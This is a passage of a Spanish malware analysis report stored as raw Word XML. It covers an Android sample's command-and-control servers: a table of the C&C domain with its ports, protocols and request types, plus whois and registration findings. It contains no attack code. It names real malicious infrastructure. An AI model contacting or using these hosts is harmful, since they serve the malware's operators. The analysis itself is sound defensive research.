    <w:p w14:paraId="1FBEACBD" w14:textId="01B3E24C" w:rsidR="00E46B56" w:rsidRDefault="00E46B56" w:rsidP="00E46B56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En la siguiente fase, se tratará de interceptar las peticiones que realiza el malware a los servidores C&amp;C</w:t>
      </w:r>
      <w:r w:rsidR="00017DE0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y tratar de modificarlas para modificar el comportamiento de la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4617C446" w14:textId="01235D43" w:rsidR="00017DE0" w:rsidRDefault="00017DE0" w:rsidP="00E46B56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para ello contamos con la información encontrada durante el análisis estático relativa a los nombres de host y puertos de servidores C&amp;C, así como</w:t>
      </w:r>
      <w:r w:rsidR="003E41B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la información relativa al establecimiento de la conexión. En resumen, los datos </w:t>
      </w:r>
      <w:r w:rsidR="0047124C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>iniciales</w:t>
      </w:r>
      <w:r w:rsidR="003E41B7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0047124C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>recabados son los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128CFE5B" w14:textId="77777777" w:rsidR="00B233F5" w:rsidRDefault="00B233F5" w:rsidP="00E46B56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-E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70"/>
        <w:gridCol w:w="1685"/>
        <w:gridCol w:w="1748"/>
        <w:gridCol w:w="1707"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E852E2" w14:paraId="54F0DC27" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2270" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="293FFC15" w14:textId="6D266C30" w:rsidR="00E852E2" w:rsidRDefault="00BF2C07">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Nombre del host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B66DF3" w14:textId="58379069" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1748" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FA4BF38" w14:textId="35E25F69" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Protocolo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E48AD2C" w14:textId="7958ADC7" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tipo de petición</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E852E2" w14:paraId="012E2310" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2270" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="373AA3DA" w14:textId="4D210066" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>fastmainlines.co.in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FACBA4F" w14:textId="362E1A84" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>45349</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1748" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="007459EC" w14:textId="7D5EA24E" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AAA5175" w14:textId="41ACB8EB" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E852E2" w14:paraId="09743E93" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2270" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6203DEAC" w14:textId="1E69767C" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>fastmainlines.co.in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49825FBA" w14:textId="7AD0FD37" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>555</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1748" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="299F2F73" w14:textId="0B0A3CF4" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AEC1030" w14:textId="1BACCB59" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E852E2" w14:paraId="72F8B4B9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2270" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2486799C" w14:textId="02D1DD4B" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>fastmainlines.co.in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F4252B" w14:textId="2FB78EC3" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>45349</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1748" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1242D81D" w14:textId="2FEC9174" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29697CD2" w14:textId="6242315B" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E852E2" w14:paraId="1656AC0B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2270" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FFE25B9" w14:textId="5EACA0E9" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>fastmainlines.co.in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73F9E480" w14:textId="197C2B29" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>555</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1748" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54BFE87A" w14:textId="2751C3EA" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61467266" w14:textId="4087E392" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E852E2" w14:paraId="351535C7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2270" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64CAE94B" w14:textId="4EC713FC" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>fastmainlines.co.in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5764D20A" w14:textId="52AD5A73" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Generado de manera aleatoria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1748" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51DAA3C5" w14:textId="777FF2E1" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>WebSocket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BC9AA1C" w14:textId="77777777" w:rsidR="00E852E2" w:rsidRDefault="00E852E2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BE4ADAF" w14:textId="77777777" w:rsidR="003E41B7" w:rsidRPr="00A675CA" w:rsidRDefault="003E41B7" w:rsidP="00E46B56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C23BA1" w14:textId="72B6E2FC" w:rsidR="009C06C7" w:rsidRDefault="0047124C" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Durante el análisis estático se identificaron los hostnames enumerados, así como los tipos de peticiones que realizan</w:t>
      </w:r>
      <w:r w:rsidR="007432DA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. La información relativa a los servidores se almacena en la tabla “</w:t>
      </w:r>
      <w:r w:rsidR="007432DA" w:rsidRPr="00A24FAE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>servers</w:t>
      </w:r>
      <w:r w:rsidR="007432DA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>” identificada previamente, incluyendo en ella datos sobre la URL, el último intento de conexión al servidor y las claves privadas en caso de ser una conexión autenticada. Inicialmente se cuenta con los dos hostnames</w:t>
      </w:r>
      <w:r w:rsidR="000D2C02">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de servidores C&amp;C, que se declaran en texto plano en la clase renombrada a “</w:t>
      </w:r>
      <w:r w:rsidR="000D2C02" w:rsidRPr="00A24FAE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ExfiltrationEscalationUtils</w:t>
      </w:r>
      <w:r w:rsidR="000D2C02">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>” durante el análisis estático.</w:t>
      </w:r>
      <w:r w:rsidR="009C06C7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> La información sobre el dominio fastmainlines.co.in obtenida mediante la herramienta whois aporta información acerca de los contactos administrativos y técnicos, siendo un dominio gestionado por el National Internet Exchange of India</w:t>
      </w:r>
      <w:r w:rsidR="00EA0ED7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NIXI)</w:t>
      </w:r>
      <w:r w:rsidR="009C06C7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7CB997" w14:textId="7C056435" w:rsidR="00600429" w:rsidRPr="00600429" w:rsidRDefault="00600429" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Sobre este dominio se sabe que se ha registrado en </w:t>
      </w:r>
      <w:r w:rsidRPr="00600429">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2023-08-17T12:41:18Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que sería una fecha previa a las primeras apariciones de la muestra de malware analizada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E8894" w14:textId="16210369" w:rsidR="009C06C7" w:rsidRDefault="009C06C7" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sin embargo, no se incluyen datos sobre la identidad utilizada para registrar el dominio, ya que estos se encuentran omitidos por privacidad.</w:t>
      </w:r>
      <w:r w:rsidR="00D713F5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Los únicos datos </w:t>
      </w:r>
      <w:r w:rsidR="001310CF">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>incluidos</w:t>
      </w:r>
      <w:r w:rsidR="00D713F5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> acerca de la </w:t>
      </w:r>
      <w:r w:rsidR="00D713F5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ubicación de la entidad registradora no parecen ser coherentes</w:t>
      </w:r>
      <w:r w:rsidR="001310CF">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, ya que se alude a un estado de Estados Unidos y </w:t>
      </w:r>
      <w:r w:rsidR="00F70F37">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">se hace uso del código de </w:t>
      </w:r>
      <w:r w:rsidR="001310CF">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Finlandia</w:t>
      </w:r>
      <w:r w:rsidR="00F70F37">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el campo de país</w:t>
      </w:r>
      <w:r w:rsidR="00D713F5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B138A" w14:textId="1D246901" w:rsidR="00D713F5" w:rsidRPr="002E690B" w:rsidRDefault="00D713F5" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E690B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Registrant State/Province: indiana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC42E0" w14:textId="586EB969" w:rsidR="00D713F5" w:rsidRDefault="00D713F5" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E690B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Registrant Country: FI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148007A0" w14:textId="0232A186" w:rsidR="002E690B" w:rsidRDefault="002E690B" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Además, se ha comprobado que el dominio está registrado</w:t>
      </w:r>
      <w:r w:rsidR="001B38C9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">pero no parece estar activo, ya que no responde a </w:t>
      </w:r>
      <w:r w:rsidR="00500E73">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>peticiones ICMP mediante ping.</w:t>
      </w:r>
      <w:r w:rsidR="00600429">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C36DC0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Se han tratado de obtener datos históricos del dominio, para lo cual se ha empleado el servicio gratuito ofrecido por WHOIS History [X].</w:t>
      </w:r>
      <w:r w:rsidR="0044401E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Los datos completos históricos del dominio generados se incluyen en el anexo. No existe mucha información que pudiese ser relevante para determinar más detalles acerca del dominio y la entidad que lo ha registrado. Sí que se incluyen varias actualizaciones del dominio en agosto de 2023, pocos días tras su registro inicial, en las que se incluye la entrada </w:t>
      </w:r>
      <w:r w:rsidR="0044401E" w:rsidRPr="0044401E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"{ omitted in the demo }"</w:t>
      </w:r>
      <w:r w:rsidR="0044401E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el campo de datos adicionales </w:t>
      </w:r>
      <w:r w:rsidR="00F6268F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
